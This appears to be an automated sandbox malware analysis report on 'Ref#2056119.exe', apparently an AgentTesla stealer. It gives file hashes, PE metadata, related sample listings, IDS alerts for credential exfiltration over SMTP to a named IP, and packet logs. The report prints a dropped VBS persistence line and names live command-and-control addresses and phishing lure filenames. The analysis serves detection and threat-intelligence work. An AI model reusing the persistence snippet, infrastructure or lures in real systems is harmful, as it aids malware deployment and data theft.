                                                                                unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                • 104.26.13.205
                                                                                https://sendbot.me/seuemprestimogarantidoGet hashmaliciousUnknownBrowse
                                                                                • 172.67.74.152
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 172.64.41.3
                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.155.47
                                                                                PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                • 104.26.13.205
                                                                                0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                                • 172.64.41.3
                                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 104.21.24.198
                                                                                CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 104.26.12.205
                                                                                New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152
                                                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 172.67.177.134
                                                                                packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.49.253
                                                                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 104.21.67.152
                                                                                VIVIDHOSTINGUSsh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 192.26.155.193
                                                                                Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                • 162.254.34.31
                                                                                Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                • 162.254.34.31
                                                                                BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                                                • 64.190.116.37
                                                                                Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.254.34.31
                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 172.64.41.3
                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.155.47
                                                                                PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                • 104.26.13.205
                                                                                0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                                • 172.64.41.3
                                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 104.21.24.198
                                                                                CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 104.26.12.205
                                                                                New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152
                                                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 172.67.177.134
                                                                                packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.49.253
                                                                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 104.21.67.152
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ePO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4Get hashmaliciousHTMLPhisherBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                lcc333.exeGet hashmaliciousUnknownBrowse
                                                                                • 172.67.129.178
                                                                                • 104.26.13.205
                                                                                No context
                                                                                Process:C:\Users\user\Desktop\Ref#2056119.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):545600
                                                                                Entropy (8bit):5.127609143858781
                                                                                Encrypted:false
                                                                                SSDEEP:6144:xIl0ntJ/3UcPagobSxxIxx0xxxxxxxGsrw3IX7a6pls:mlutTGsLm
                                                                                MD5:225F257617CD3A58DB6D4CCC447F48E9
                                                                                SHA1:7C77E10D7CB01BC37B1F3CB21D7BA34BECF85857
                                                                                SHA-256:987697D24303E9BF9507F4F5835664BF32F61B4920A52D08B51F1E35951E1D8C
                                                                                SHA-512:5380826659FC91674B70BF178D5ACC5625B5CC3EFB8BE2906074DD54133D34CD7DCEDCE5F6CF8F705CB7BE1240A4371399023E2B89F01895AF0526D2A820E7B8
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RDg.................>...........]... ...`....@.. ....................................`.................................T]..W....`...............6..@....`....................................................... ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc.......`.......4..............@..B.................]......H..........l.......M...................................................0...........s#...}.....s$...}.....(%.....}.......(.... A.B.(L...(&...,. w.B.(L...s'...z...(.....(....s(...}......{.....()...}......(....(....*.:...($...(....*..0...........{....o*.......+...+r.(....-...Y..+c..{.....(+...}.......(.......(....(,......3...(....&....Y(-.......(....-...{.....()...}........XY.....0.*....0...........,..(....-..*..o.....T....o.....W3K..o.....W..,...+%.(.......Y.......(/.........
                                                                                Process:C:\Users\user\Desktop\Ref#2056119.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:modified
                                                                                Size (bytes):80
                                                                                Entropy (8bit):4.7046271200716845
                                                                                Encrypted:false
                                                                                SSDEEP:3:FER/n0eFHHot+kiEaKC5dfEHHn:FER/lFHIwknaZ5dfI
                                                                                MD5:2A3A1666420EFB8E93698256013F3AC4
                                                                                SHA1:404E55E1BC84328C413BDDD524D9DA1746CE9D55
                                                                                SHA-256:F3ECF1E59D22B070AB484D1447266710795722DE52CDF0556D092CB7B3E6A8D4
                                                                                SHA-512:6F2F7EB445981702E6CB40D94C0C9EF556C06F5D255474768F9551EFA6BFA37DB8BC428BB0FDB95A22BE4150EFBCBDFEEC643B44E1A30D586E24D9C46F2B90AC
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\ishon.exe"""
                                                                                Process:C:\Users\user\Desktop\Ref#2056119.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):545600
                                                                                Entropy (8bit):5.125935830889348
                                                                                Encrypted:false
                                                                                SSDEEP:6144:jvA6CCOPagobSxxIxx0xxxxxxxGsrw3IX7a6pla:r0TGsLs
                                                                                MD5:2C4DB8B396DFF48BA1E6AE44BD9AAE08
                                                                                SHA1:79319657ECFB6F4F7B13AB1E99DF278A53B7D101
                                                                                SHA-256:BE5CA82D327D53FC7EB8719289394CF37CC1F45D39429B8E527D600193B706E0
                                                                                SHA-512:0E6A30620C38DC796C67394B3C0884ABF342810C9E2FF7EC62550FB101F229F3E17F706009976844FE802716171813BC9DD7E8D6A4985D67B5DC31ACBAA5A583
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 37%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SDg.................>..........j]... ...`....@.. ....................................`..................................]..W....`...............6..@....`....................................................... ............... ..H............text...p=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc.......`.......4..............@..B................L]......H...........d............................................................0...........s#...}.....s$...}.....(%.....}.......(.... ..v(L...(&...,. ...v(L...s'...z...(.....(....s(...}......{.....()...}......(....(....*.:...($...(....*..0...........{....o*.......+...+r.(....-...Y..+c..{.....(+...}.......(.......(....(,......3...(....&....Y(-.......(....-...{.....()...}........XY.....0.*....0...........,..(....-..*..o.....T....o.....W3K..o.....W..,...+%.(.......Y.......(/.........
                                                                                Process:C:\Users\user\Desktop\Ref#2056119.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):5.125935830889348
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:Ref#2056119.exe
                                                                                File size:545'600 bytes
                                                                                MD5:2c4db8b396dff48ba1e6ae44bd9aae08
                                                                                SHA1:79319657ecfb6f4f7b13ab1e99df278a53b7d101
                                                                                SHA256:be5ca82d327d53fc7eb8719289394cf37cc1f45d39429b8e527d600193b706e0
                                                                                SHA512:0e6a30620c38dc796c67394b3c0884abf342810c9e2ff7ec62550fb101f229f3e17f706009976844fe802716171813bc9dd7e8d6a4985d67b5dc31acbaa5a583
                                                                                SSDEEP:6144:jvA6CCOPagobSxxIxx0xxxxxxxGsrw3IX7a6pla:r0TGsLs
                                                                                TLSH:13C46EADC2B8BCEBD41745B5DC76A9E1082BEF1854691E1A382A705325733933CB6C1F
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SDg.................>..........j]... ...`....@.. ....................................`................................
                                                                                Icon Hash:7c64ccccd4e8f4cc
                                                                                Entrypoint:0x415d6a
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x67445315 [Mon Nov 25 10:36:05 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Signature Valid:false
                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                Error Number:-2146869232
                                                                                Not Before, Not After
                                                                                • 11/08/2021 20:00:00 10/08/2023 19:59:59
                                                                                Subject Chain
                                                                                • CN="Aicho Software Technology Co., LTD.", O="Aicho Software Technology Co., LTD.", L=\u5357\u4eac\u5e02, S=\u6c5f\u82cf\u7701, C=CN, SERIALNUMBER=91320192MA1YED3N92, OID.1.3.6.1.4.1.311.60.2.1.1=\u5357\u4eac\u7ecf\u6d4e\u6280\u672f\u5f00\u53d1\u533a, OID.1.3.6.1.4.1.311.60.2.1.2=\u6c5f\u82cf\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                                Version:3
                                                                                Thumbprint MD5:074C8CEBBDDB8C1AE41B66D468CC1A95
                                                                                Thumbprint SHA-1:7A4D4234CF32049903B9CDE0C0A0DA6D28398EAD
                                                                                Thumbprint SHA-256:027CC9D52DBEA32673B1D2BCD891F9E4E70EE720B6C5A6A8ACA7B6F9FB90B066
                                                                                Serial:078048AB9392D8BF9BA2B3A1B7098014
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x15d100x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x6f388.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x836000x1d40.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x13d700x13e00afe09f13af2410b957dba48e0d81dcb2False0.4660107114779874data6.0368777303787455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x160000x6f3880x6f4000afff6474adf3741af4b2ff6324ef474False0.19252765098314606data4.6618352677881845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x860000xc0x200a013b057479700ea0df7549d955e4092False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x162b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6170212765957447
                                                                                RT_ICON0x167180x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.4598360655737705
                                                                                RT_ICON0x170a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.3818011257035647
                                                                                RT_ICON0x181480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.28226141078838174
                                                                                RT_ICON0x1a6f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.22691308455361361
                                                                                RT_ICON0x1e9180x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.16452070632751734
                                                                                RT_ICON0x27dc00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.12943629480657753
                                                                                RT_ICON0x385e80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2703360.07427434387667545
                                                                                RT_ICON0x7a6100xa775PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced0.970771419907159
                                                                                RT_GROUP_ICON0x84d880x84data0.7045454545454546
                                                                                RT_VERSION0x84e0c0x3c8data0.40289256198347106
                                                                                RT_MANIFEST0x851d40x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385
                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-11-25T14:47:21.747037+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449757162.254.34.31587TCP
                                                                                2024-11-25T14:47:21.747037+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449757162.254.34.31587TCP
                                                                                2024-11-25T14:47:46.266953+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449743162.254.34.31587TCP
                                                                                2024-11-25T14:47:46.266953+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449743162.254.34.31587TCP
                                                                                2024-11-25T14:48:13.004462+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449757162.254.34.31587TCP
                                                                                2024-11-25T14:48:13.004462+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449757162.254.34.31587TCP
                                                                                2024-11-25T14:49:22.543441+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449743162.254.34.31587TCP
                                                                                2024-11-25T14:49:22.543441+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449743162.254.34.31587TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 25, 2024 14:47:22.166501045 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:22.166543007 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:22.166613102 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:22.184220076 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:22.184242010 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:23.450870991 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:23.451062918 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:23.512252092 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:23.512304068 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:23.512658119 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:23.563074112 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:23.884465933 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:23.931337118 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.536573887 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.542457104 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.542489052 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.542515993 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.542525053 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.542541981 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.542551994 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.542557955 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.542586088 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.551647902 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.562796116 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.562863111 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.562881947 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.610027075 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.610061884 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.656780958 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.656810999 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.656848907 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.656900883 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.744823933 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.748661041 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.748738050 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.748778105 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.756444931 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.756634951 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.756644011 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.764323950 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.764404058 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.764414072 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.772377014 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.772437096 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.772447109 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.780380964 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.780576944 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.780584097 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.788228035 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.788292885 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.788299084 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.796046019 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.796101093 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.796114922 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.808870077 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.808989048 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.809046984 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.809065104 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.809195995 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.815490007 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.821849108 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.821907997 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.821913004 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.821922064 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.821973085 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.828453064 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.834861994 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.834922075 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.834930897 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.875586033 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.945964098 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.952133894 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.952207088 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.952223063 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.961848974 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.961858988 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.961976051 CET49737443192.168.2.4172.67.129.178
                                                                                Nov 25, 2024 14:47:24.961986065 CET44349737172.67.129.178192.168.2.4
                                                                                Nov 25, 2024 14:47:24.970978975 CET44349737172.67.129.178192.168.2.4
